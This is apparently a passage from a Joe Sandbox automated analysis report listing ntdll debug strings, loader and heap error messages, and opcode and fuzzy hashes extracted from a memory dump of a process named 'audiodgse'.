                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                • API String ID: 0-2368682639
                                                                                • Opcode ID: 9e13a3e9059f2e4f0d84bfb250b22f217f84924b5d5fd7cdc80f77e37e40f9ab
                                                                                • Instruction ID: 8038ed8f1f9797737fe37fa26d06a59afdcef5a4cc8ba10adf5531b80509a806
                                                                                • Opcode Fuzzy Hash: 9e13a3e9059f2e4f0d84bfb250b22f217f84924b5d5fd7cdc80f77e37e40f9ab
                                                                                • Instruction Fuzzy Hash: B5819DB1A61349EFDB64CF99C845BAEBBB5FB08B14F144119F605BB240D3B5A940CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 012D2602
                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 012D2506
                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012D24C0
                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 012D2409
                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 012D2624
                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012D22E4
                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 012D2412
                                                                                • @, xrefs: 012D259B
                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 012D2498
                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 012D261F
                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012D25EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                • API String ID: 0-4009184096
                                                                                • Opcode ID: 6fb04c8588c5d23c6ac7e7d726020711f977f0179252775fc7a49aeb70838ba8
                                                                                • Instruction ID: 2a50ee8a03866c46fd3a957a3e9837d70a0dc3d8196d01deef27e3dbcaf56fc4
                                                                                • Opcode Fuzzy Hash: 6fb04c8588c5d23c6ac7e7d726020711f977f0179252775fc7a49aeb70838ba8
                                                                                • Instruction Fuzzy Hash: 430271B1D20229DFDF21DB58CD81BA9B7B8AF54304F4141DAEB09A7241DB709E84CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                • API String ID: 0-2515994595
                                                                                • Opcode ID: d22d0890918fdb7e885b69dd39b4f77e228007c390efef8ba4cc451279a95339
                                                                                • Instruction ID: 48ce2490abd8cfb010ce8c2ad6d0126bbc4269699649861885981eabeda768da
                                                                                • Opcode Fuzzy Hash: d22d0890918fdb7e885b69dd39b4f77e228007c390efef8ba4cc451279a95339
                                                                                • Instruction Fuzzy Hash: 0E51E2B1914305ABCB26DF1C8854BABBBECEFD4758F144A5DE984C3280E770D604C792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                • API String ID: 0-1700792311
                                                                                • Opcode ID: 8e19c34104e07b830dcf672c65cc5514b2795feeaeebce65acee3107ac1c995f
                                                                                • Instruction ID: eceecc063ddaf1988fd6ceb389021a2fa8d1dd2d25ff3b4d478b07e8177c5830
                                                                                • Opcode Fuzzy Hash: 8e19c34104e07b830dcf672c65cc5514b2795feeaeebce65acee3107ac1c995f
                                                                                • Instruction Fuzzy Hash: 3FD1DD31610686DFDB2EDF68C480AADBBF2FF4A718F088459F8459B656D7349981CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • VerifierFlags, xrefs: 012E8C50
                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 012E8A67
                                                                                • VerifierDlls, xrefs: 012E8CBD
                                                                                • AVRF: -*- final list of providers -*- , xrefs: 012E8B8F
                                                                                • HandleTraces, xrefs: 012E8C8F
                                                                                • VerifierDebug, xrefs: 012E8CA5
                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 012E8A3D
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                • API String ID: 0-3223716464
                                                                                • Opcode ID: cd73d1c29f39bf52cf361c0c813979d206e3d32f317111e7a3e67bd666cc88d0
                                                                                • Instruction ID: c2c8f05c01d6060e30a17f1541db5f08b794559128871b2ca6c6f5a5fe8aec44
                                                                                • Opcode Fuzzy Hash: cd73d1c29f39bf52cf361c0c813979d206e3d32f317111e7a3e67bd666cc88d0
                                                                                • Instruction Fuzzy Hash: E4913672661706EFDB21EF28C889F2B77E9EB54B14F85045CFA85AB280D770AC00C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                • API String ID: 0-1109411897
                                                                                • Opcode ID: ed623163687b1fb3ae26d50a0c3060b7a583a4cafba879873c732fe5aa8d3ede
                                                                                • Instruction ID: 6f7cc55df3e2a9a56f0f5f09c8dd609cea112b0df7b48e41622016348ce2922b
                                                                                • Opcode Fuzzy Hash: ed623163687b1fb3ae26d50a0c3060b7a583a4cafba879873c732fe5aa8d3ede
                                                                                • Instruction Fuzzy Hash: 6CA25F74A2566ACFDF64DF18CD987AABBB5AF45704F1042D9DA09A7290DB709EC0CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-792281065
                                                                                • Opcode ID: de0e809e85a78fabd82b84fa2a293317f18830eb293e46f0712d0f328edfce08
                                                                                • Instruction ID: ca0e5a58f0a3b7b105b07d9a29ad2fcb1ad2e1ed4f8ffbe8d1285112e5b22f46
                                                                                • Opcode Fuzzy Hash: de0e809e85a78fabd82b84fa2a293317f18830eb293e46f0712d0f328edfce08
                                                                                • Instruction Fuzzy Hash: 6D911771B70356DBEB39EF68D849BBA7BE5FF41B14F040129EA006B681D7B49801CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012B99ED
                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 012B9A01
                                                                                • apphelp.dll, xrefs: 01256496
                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 012B9A2A
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012B9A11, 012B9A3A
                                                                                • LdrpInitShimEngine, xrefs: 012B99F4, 012B9A07, 012B9A30
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-204845295
                                                                                • Opcode ID: d90b579613561c1bee8f57f4e70a7a7387e5e9a3b0ba4c811af4a52c866429eb
                                                                                • Instruction ID: 7a43aa71a69f442dd2fbe78c785dd4b66740870f21e2a15341fb1a85b5e6237d
                                                                                • Opcode Fuzzy Hash: d90b579613561c1bee8f57f4e70a7a7387e5e9a3b0ba4c811af4a52c866429eb
                                                                                • Instruction Fuzzy Hash: 2251B3B12783059FDB24DF25D881BAB7BE8FF84B88F40091DFA8597150D670E944CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 012D2180
                                                                                • RtlGetAssemblyStorageRoot, xrefs: 012D2160, 012D219A, 012D21BA
                                                                                • SXS: %s() passed the empty activation context, xrefs: 012D2165
                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 012D2178
                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 012D219F
                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012D21BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                • API String ID: 0-861424205
                                                                                • Opcode ID: 8bbf015f72a1185c803f1e485d7d02902c27fcca11b324d09fb3fbb2da8727e6
                                                                                • Instruction ID: d295b41d09983fa5db70aaed69ea98fa2df1c216a222938bca0c384c8b2e38b0
                                                                                • Opcode Fuzzy Hash: 8bbf015f72a1185c803f1e485d7d02902c27fcca11b324d09fb3fbb2da8727e6
                                                                                • Instruction Fuzzy Hash: F0310736B70216F7FB258AADCC45FAE7A68DBA5A50F054059BB14BB141D370DA00C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • Loading import redirection DLL: '%wZ', xrefs: 012D8170
                                                                                • LdrpInitializeImportRedirection, xrefs: 012D8177, 012D81EB
                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 012D8181, 012D81F5
                                                                                • LdrpInitializeProcess, xrefs: 0129C6C4
                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 012D81E5
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0129C6C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                • API String ID: 0-475462383
                                                                                • Opcode ID: 2f180e75e5fab4095e0de0bb0961b0e2fb878ea8200cb1c27f489b468c4bdf20
                                                                                • Instruction ID: 0a922e45e478da9b42494fb512edfd0bb0e5088f9562b5695a5b2d1ecdaf5e83
                                                                                • Opcode Fuzzy Hash: 2f180e75e5fab4095e0de0bb0961b0e2fb878ea8200cb1c27f489b468c4bdf20
                                                                                • Instruction Fuzzy Hash: B231E2B16643469FC724EF29DD46E2ABBE4AFD4B10F040558F944AB2D1E660EC04CBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 012A2DF0: LdrInitializeThunk.NTDLL ref: 012A2DFA
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012A0BA3
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012A0BB6
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012A0D60
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012A0D74
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 1404860816-0
                                                                                • Opcode ID: 22780276ae6bb20515ae761fdd9a234a53d15a36e31d435b5bc8cfa4bf95de69
                                                                                • Instruction ID: 6fa8f06f7e20e9d512a190377c0ac04c89575fd21f4241b1a45e160aa14efab4
                                                                                • Opcode Fuzzy Hash: 22780276ae6bb20515ae761fdd9a234a53d15a36e31d435b5bc8cfa4bf95de69
                                                                                • Instruction Fuzzy Hash: E8427E71910716DFDB21CF28C981BAAB7F5FF04304F5445AAEA89DB241E770A984CF61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                • API String ID: 0-379654539
                                                                                • Opcode ID: c3ab3e86b478b9bf4bd742f382769af2786a20e1363b42ec4f53219237fd3c57
                                                                                • Instruction ID: 4c5a59bc0d41b4f8f56d2600c47a4878ba955e2c6da80d3cf996dc1e3d5c7e1c
                                                                                • Opcode Fuzzy Hash: c3ab3e86b478b9bf4bd742f382769af2786a20e1363b42ec4f53219237fd3c57
                                                                                • Instruction Fuzzy Hash: 35C1AE70528382CFD711CF58C440B6AB7E8FF84704F04496EFA96AB291E774CA85CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • LdrpInitializeProcess, xrefs: 01298422
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01298421
                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0129855E
                                                                                • @, xrefs: 01298591
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-1918872054
                                                                                • Opcode ID: 1260ca82994246ba087796107adce7a53f4faac2f363634a8de12125fbbede5f
                                                                                • Instruction ID: 352080a48c54741fc3c7052286d59a3bf219558f8f149b836492e9a968fdf502
                                                                                • Opcode Fuzzy Hash: 1260ca82994246ba087796107adce7a53f4faac2f363634a8de12125fbbede5f
                                                                                • Instruction Fuzzy Hash: 8C91AD7156834AAFDB21DF69CC41FABBAE8FF84744F44092EF68492151E370D908CB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • .Local, xrefs: 012928D8
                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012D21D9, 012D22B1
                                                                                • SXS: %s() passed the empty activation context, xrefs: 012D21DE
                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012D22B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                • API String ID: 0-1239276146
                                                                                • Opcode ID: 069c46bbbdc732ab4e7d50d07eb7d36271722519837ede87b1186bf47e9c2f6f
                                                                                • Instruction ID: b8f8552ec8c823ab61cc50a80663452d70c26023a69e2dd2f15084501e84ba53
                                                                                • Opcode Fuzzy Hash: 069c46bbbdc732ab4e7d50d07eb7d36271722519837ede87b1186bf47e9c2f6f
                                                                                • Instruction Fuzzy Hash: 01A1C83192022ADFDF25CF58DC88BA9B7B1BF58354F2441E9EA08A7251D7709E80CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 012C1028
                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 012C0FE5
                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012C10AE
                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 012C106B
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                • API String ID: 0-1468400865
                                                                                • Opcode ID: d6e124fa84d0c8ca28023bdc5dd3f4c331defd39a2b760ef69a9f97e9d56485c
                                                                                • Instruction ID: c58cf38c878f0ab623446e568c928399097d205fa457eed4fd7a85d1e1a943c1
                                                                                • Opcode Fuzzy Hash: d6e124fa84d0c8ca28023bdc5dd3f4c331defd39a2b760ef69a9f97e9d56485c
                                                                                • Instruction Fuzzy Hash: EC71A0B19243469FCB21DF14C886BAB7BACAF94764F400568FE488B286D774D588CBD1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 012CA992
                                                                                • LdrpDynamicShimModule, xrefs: 012CA998
                                                                                • apphelp.dll, xrefs: 01282462
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012CA9A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-176724104
                                                                                • Opcode ID: 0745f0024f86f8300a2e96a88a5b3f1c8f8954643e3f52cc016b682a2ece56cb
                                                                                • Instruction ID: 03223888d29d4ced3d1d3f138b17f987cb2fd6a6717aa1db1aef81fb85b4efe4
                                                                                • Opcode Fuzzy Hash: 0745f0024f86f8300a2e96a88a5b3f1c8f8954643e3f52cc016b682a2ece56cb
                                                                                • Instruction Fuzzy Hash: B7315B71620306EBDB359F5DD886EBABBBCFB80F04F16011DEA0067255D7B09981C790
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0127327D
                                                                                • HEAP[%wZ]: , xrefs: 01273255
                                                                                • HEAP: , xrefs: 01273264
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                • API String ID: 0-617086771
                                                                                • Opcode ID: 2d23f5730d23767798c7c42be109cef5555795d48c7371e4fa3ed23c1a6653d4
                                                                                • Instruction ID: ca04a097af0a87e652f1db747817bcf35f712db4b22b9636a4254085bf2d8e52
                                                                                • Opcode Fuzzy Hash: 2d23f5730d23767798c7c42be109cef5555795d48c7371e4fa3ed23c1a6653d4
                                                                                • Instruction Fuzzy Hash: 8F92DD71A2424ADFDB29CF68C4407AEBBF1FF49300F188459E989AB391D774A941DF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                • API String ID: 0-4253913091
                                                                                • Opcode ID: 44d34009744b278adbd6a90211e7c4429342848e24fa9c1ca3ae17239ac722b8
                                                                                • Instruction ID: 5b7319dcebe750238b7f6aad8b8a1aff6cda7d3fc6ba0a7c847e9a91356d8597
                                                                                • Opcode Fuzzy Hash: 44d34009744b278adbd6a90211e7c4429342848e24fa9c1ca3ae17239ac722b8
                                                                                • Instruction Fuzzy Hash: D3F1CC70720606DFEB25CF68C884B6AB7F6FF45B04F148268E6069B381D770E985CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $@
                                                                                • API String ID: 0-1077428164
                                                                                • Opcode ID: 75dea2c569c627182e5869a9271d3673ab2a2d41e22504326a3df3249d8bb7e3
                                                                                • Instruction ID: 1a6727f2f470305347ce905389978d87a081bf2dc31dc9b8bfe0b2aa3be287f5
                                                                                • Opcode Fuzzy Hash: 75dea2c569c627182e5869a9271d3673ab2a2d41e22504326a3df3249d8bb7e3
                                                                                • Instruction Fuzzy Hash: 41C2B1716293429FE725DF28C841BABBBE5BF88704F14892DFA89C7281D774D805CB52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                • API String ID: 0-2779062949
                                                                                • Opcode ID: 3b5208bef2395abb881cd91adbea7c35afbcb4bf32dba8733ae0d099098dbfad
                                                                                • Instruction ID: ae7eed2ae7fa224508232baff5b82a53d24aaef0f7d2ddb6525fb199db0edfd2
                                                                                • Opcode Fuzzy Hash: 3b5208bef2395abb881cd91adbea7c35afbcb4bf32dba8733ae0d099098dbfad
                                                                                • Instruction Fuzzy Hash: 57A16C7192122A9BDB31DF28CC89BEAB7B8EF44750F1041E9EA08A7250D7359F85CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • LdrpCheckModule, xrefs: 012CA117
                                                                                • Failed to allocated memory for shimmed module list, xrefs: 012CA10F
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012CA121
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-161242083
                                                                                • Opcode ID: 870249264abb1d3e045cf2c0799045e8d63f324f92d9abf5dfddf37c53bd8f13
                                                                                • Instruction ID: 480cd9bcba537be91420de05a1ce0b64b17d94b5dc3a034fae708d2d091f1512
                                                                                • Opcode Fuzzy Hash: 870249264abb1d3e045cf2c0799045e8d63f324f92d9abf5dfddf37c53bd8f13
                                                                                • Instruction Fuzzy Hash: C071D071A21306DFDB25EF68C981BBEB7F8FB44B04F14402DE60297291E774A985CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
